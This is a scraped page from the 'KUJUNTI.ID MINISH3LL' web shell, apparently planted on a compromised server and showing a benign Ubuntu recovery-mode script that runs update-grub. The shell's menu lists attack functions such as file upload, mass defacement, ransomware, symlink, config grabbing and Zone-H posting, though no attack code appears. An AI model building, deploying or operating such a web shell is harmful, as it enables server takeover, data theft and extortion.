KUJUNTI.ID MINISH3LL
Path : /lib/recovery-mode/options/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : //lib/recovery-mode/options/grub


#!/bin/sh

. /lib/recovery-mode/l10n.sh

if [ "$1" = "test" ]; then
  echo $(eval_gettext "Update grub bootloader")
  exit 0
fi

# FIXME: add this too? how to find out boot device?
#        add menu to ask?
#grub-install
update-grub

echo ""
echo $(eval_gettext "Finished, please press ENTER")
read TMP

exit 0

© KUJUNTI.ID